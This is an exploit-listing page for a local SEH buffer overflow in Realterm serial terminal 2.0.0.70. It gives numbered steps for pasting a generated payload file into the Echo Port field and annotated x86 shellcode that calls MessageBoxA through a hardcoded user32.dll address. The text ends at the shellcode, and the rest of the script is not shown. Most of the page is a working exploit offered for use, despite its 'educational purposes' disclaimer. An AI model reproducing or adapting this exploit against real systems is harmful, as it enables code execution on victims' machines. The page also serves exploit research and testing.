Realterm serial terminal 2.0.0.70 echo port buffer overflow (seh) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-02-21 |
Type : local |
Platform : windows
This exploit / vulnerability Realterm serial terminal 2.0.0.70 echo port buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
# 1.- Run the python script it will create a new file "carbonara.txt"
# 2.- Copy the content of the new file 'carbonara.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or
# 8.- Box!
import socket
import struct
'''
badchars: 0x20,0x0a
arwin.exe user32.dll MessageBoxA
arwin - win32 address resolution program - by steve hanna - v.01
MessageBoxA is located at 0x747cfdae in user32.dll
'''
shellcode = (
"\x33\xc0" # XOR EAX,EAX
"\x50" # PUSH EAX => padding for lpCaption
"\x68\x7a\x6f\x21\x21" # PUSH "zo!!"
"\x68\x61\x76\x61\x6e" # PUSH "avan"
"\x8B\xCC" # MOV ECX,ESP => PTR to lpCaption
"\x50" # PUSH EAX => padding for lpText
"\x68\x6e\x7a\x6f\x21" # PUSH "nzo!"
"\x68\x61\x76\x61\x21" # PUSH "ava!"
"\x8B\xD4" # MOV EDX,ESP => PTR to lpText
"\x50" # PUSH EAX - uType=0x0
"\x51" # PUSH ECX - lpCaption
"\x52" # PUSH EDX - lpText
"\x50" # PUSH EAX - hWnd=0x0
"\xBE\xae\xfd\x7c\x74" # MOV ESI,USER32.MessageBoxA <<< hardcoded address
"\xFF\xD6") # CALL ESI